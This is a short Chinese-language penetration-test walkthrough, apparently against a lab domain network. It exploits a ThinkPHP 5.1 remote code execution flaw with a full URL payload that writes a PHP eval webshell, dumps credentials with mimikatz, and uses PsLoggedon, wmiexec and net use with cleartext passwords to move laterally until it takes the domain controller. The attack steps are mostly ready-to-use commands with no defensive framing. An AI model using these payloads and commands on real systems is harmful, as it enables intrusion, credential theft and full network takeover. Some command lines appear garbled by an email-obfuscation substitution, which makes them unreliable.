【資訊收集】

訪問80埠發現網站使用了thinkphp5.1版本

【漏洞利用】

搜尋thinkphp使用的事5.1版本
https://www.vulnspy.com/cn-thinkphp-5.x-rce/

寫入一句話：

http://192.168.43.35/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=x.php&vars[1][]=%3C?php%20@eval($_POST[%27cmd%27]);?%3E
 

蟻劍連結

【內網資訊收集】

發現是域環境，但是域內主機不多

【橫向移動】

上傳mimikatz 抓取當前主機雜湊

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt`

type log.txt

這是抓取到本地PC賬戶和administrator使用者名稱和密碼

因為開啟3389，使用administrator使用者連線

這時候上傳PsLoggedon （它通過檢驗登錄檔裡HKEY_USERS的key值來查詢誰登陸過機器，同樣也呼叫到了NetSessionEnum API）

PsLoggedon.exe /accetpeula administrator

這時我們發現域控登入過“CHENGCHENG”這臺主機

查詢”CHENGCHENG”主機IP 為“172.16.12.18”

我們發下CHENGCHENG本地管理員使用者和CHANGSHENG本地管理員使用者密碼一樣！

上傳“wmiexec”做掛載，目的上傳mimikatz

wmiexec.exe CHENGCHENG/administrator:[email protected] "hostname"

掛載CHENGCHENG遠端的C盤到本地f盤

net use f: \\chengcheng\c$ 110110zccZCC /user:chengcheng\administrator
 

將mimikatz拷貝至CHENGCHENG C:

執行mimikatz
wmiexec.exe chengcheng/administrator:[email protected] "c:\phpstudy_pro\WWW\thinkphp-5.1.29\html\public\run.bat"
至此，成功拿下域管理員